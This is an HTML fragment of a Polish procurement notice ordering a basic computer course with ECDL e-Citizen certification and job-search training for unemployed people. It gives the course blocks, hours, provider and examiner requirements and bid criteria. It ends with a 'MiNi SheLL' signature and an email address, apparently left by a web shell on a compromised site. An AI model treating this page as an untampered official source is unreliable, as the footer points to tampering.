<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KURS PODSTAWOWEJ OBSŁUGI KOMPUTERA Z EUROPEJSKIM CERTYFIKATEM UMIEJĘTNOŚCI KOMPUTEROWYCH ECDL e-OBYWATEL (e-CITIZEN) I TRENINGIEM INTERPERSONALNYM.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Celem kursu jest nabycie przez osoby bezrobotne umiejętności w zakresie podstawowej obsługi komputera oraz przygotowanie uczestników szkolenia do egzaminu praktycznego z zakresu ECDL e-Obywatel (e-Citizen).
- Szkolenie przeznaczone jest dla osób z wykształceniem podstawowym lub posiadających doświadczenie zawodowe (minimum 1 rok w ostatnich 5 latach) 
w zawodach wymagających znajomości obsługi komputera. W pierwszej kolejności kwalifikowane będą osoby bezrobotne powyżej 45 roku życia bez znajomości obsługi komputera. 
Szkolenie powinno składać się z następujących bloków tematycznych:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian oraz metody i techniki poszukiwania pracy, nastawiony na zmianę postaw uczestników szkolenia, zmotywowanie ich i przygotowanie do aktywnego poszukiwania pracy. Zajęcia te powinny odbywać się w formie ćwiczeń, warsztatów. W II połowie trwania szkolenia każdy uczestnik powinien zostać objęty coachingiem, polegającym na pomocy i kierowaniu rozwojem umiejętności oraz kompetencji osoby, prowadzonym indywidualnie przez trenera. Łącznie zagadnienia te powinny obejmować 40 godzin (w tym 2 godziny coachingu).
II BLOK: Obsługa komputera, w tym obsługa środowiska Windows oraz wybrane zagadnienia z pakietu Microsoft Office. Łączna liczba godzin: 60 godzin.
IV BLOK: Europejski Certyfikat Umiejętności Komputerowych ECDL e-Obywatel (e-Citizen) - 100 godz. Ogólne wskazania dotyczące Bloku IV - Europejski Certyfikat Umiejętności Komputerowych ECDL e-Obywatel (e-Citizen):
Zajęcia z tego modułu powinny pomóc użytkownikom wykorzystywać maksymalnie Internet poprzez wyjaśnienie reguł jego działania oraz pokazanie jak może on być użyty do wielu zastosowań. W szczególności należy uwzględnić takie dziedziny życia codziennego jak: załatwianie spraw urzędowych, znajdowanie informacji, w tym związanych z zatrudnieniem i ofertami pracy, a także robienie zakupów, komunikowanie się z rodziną i przyjaciółmi za pośrednictwem Internetu. 
- Szkolenie powinno być przeprowadzone przez instytucję szkoleniową posiadającą uprawnienia do egzaminowania w zakresie Europejskiego Certyfikatu Umiejętności Komputerowych oraz wyposażoną w odpowiedni sprzęt i oprogramowanie niezbędne 
do przeprowadzenia egzaminu ECDL e-Obywatel. 
- Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. 
- Egzamin powinien być przeprowadzony przez egzaminatorów ECDL posiadających certyfikat Egzaminatora ECDL e-Obywatel oraz wpisanych na listę egzaminatorów ECDL prowadzoną przez Polskie Biuro ECDL. 
- Do oferty należy dołączyć dokumenty potwierdzające posiadanie powyższych uprawnień, zarówno przez instytucję szkoleniową jak i wykładowców/ egzaminatorów z ramienia instytucji szkoleniowej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com